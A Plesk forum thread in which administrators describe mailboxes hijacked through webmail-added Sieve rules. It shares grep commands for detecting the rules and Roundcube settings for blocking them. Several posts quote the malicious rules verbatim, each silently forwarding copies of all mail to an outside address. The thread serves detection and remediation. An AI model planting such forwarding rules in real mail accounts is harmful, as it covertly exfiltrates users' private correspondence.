• We value your experience with Plesk during 2024
    Plesk strives to perform even better in 2025. To help us improve further, please answer a few questions about your experience with Plesk Obsidian 2024.
    Please take this short survey:

    https://pt-research.typeform.com/to/AmZvSXkx
  • The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.
  • We’re working on enhancing the Monitoring feature in Plesk, and we could really use your expertise! If you’re open to sharing your experiences with server and website monitoring or providing feedback, we’d love to have a one-hour online meeting with you.

Issue dovecot / roundcube sieve hack

tkalfaoglu

Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:

.dovecot.sieve -> sieve/roundcube.sieve

and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];

PS: You may wish to do a check of your systems, just do a:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;

My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
 
PS: this gmail email address appears in the whois registry of prornec.com which is located in Lagos, Nigeria!
 
PS: Looking at PLESK mail accounts page, there appears to be NO redirect.
Perhaps PLESK should also check these sieve settings when it displays the list of emails - and not only the redirects that have been placed using the PLESK interface..
 
prornec.com domain was hosted in servers in Romania, with IP ranges of:
45.89.175.0 - 45.89.175.255
 
Sorry - the command should have been:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec grep redirect {} \;

the echo was my debug version :) -t
 
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Have a look a the config file from Roundcubes managesieve plugin. There are some options that might prevent creating similar rules trough Roundcube. The $config['managesieve_raw_editor'] and $config['managesieve_forward'] seem useful options to restrict in this regard.

Needless to say that it is always best to make every effort to protect user/email accounts so to prevent unauthorized access in the first place.
 
Many thanks.. the forward option does not contain a disable option..

Code:
// Enables separate management interface for setting forwards (redirect to and copy to)
// 0 - no separate section (default),
// 1 - add Forward section,
// 2 - add Forward section, but hide Filters section
$config['managesieve_forward'] = 0;

In any case, I changed it to 2 and will check its impact. Likewise I'm going to disable the managesieve plugin.
 
I noticed the same issue with Horde as well. Someone hacked some people's ingo.sieve files to put redirects..
Nothing visible in the plesk interface, so I assume it was done via the horde interface.
 
We had same issue, highly recommend every one to check their sieve(.dovecot.sieve, roundcube.sieve, ingo.sieve) files, you can check with this simple line:

find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep 'copy'
or
find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep '@'

Notice, some of these filters can be user set, check them with users.


Sample of our findings:


#1

if allof (header :contains "subject" "@")
{
redirect :copy "[email protected]";
}
require ["fileinto"];
require "fileinto";

#2

if true
{
redirect :copy "[email protected]";
}
 
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code:
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
 
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code:
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
As an additional note, this only works for RC version 1.5 and up. Which is currently is not available on Plesk for CentOS 7.9 and Ubuntu 18.04.
 
Back
Top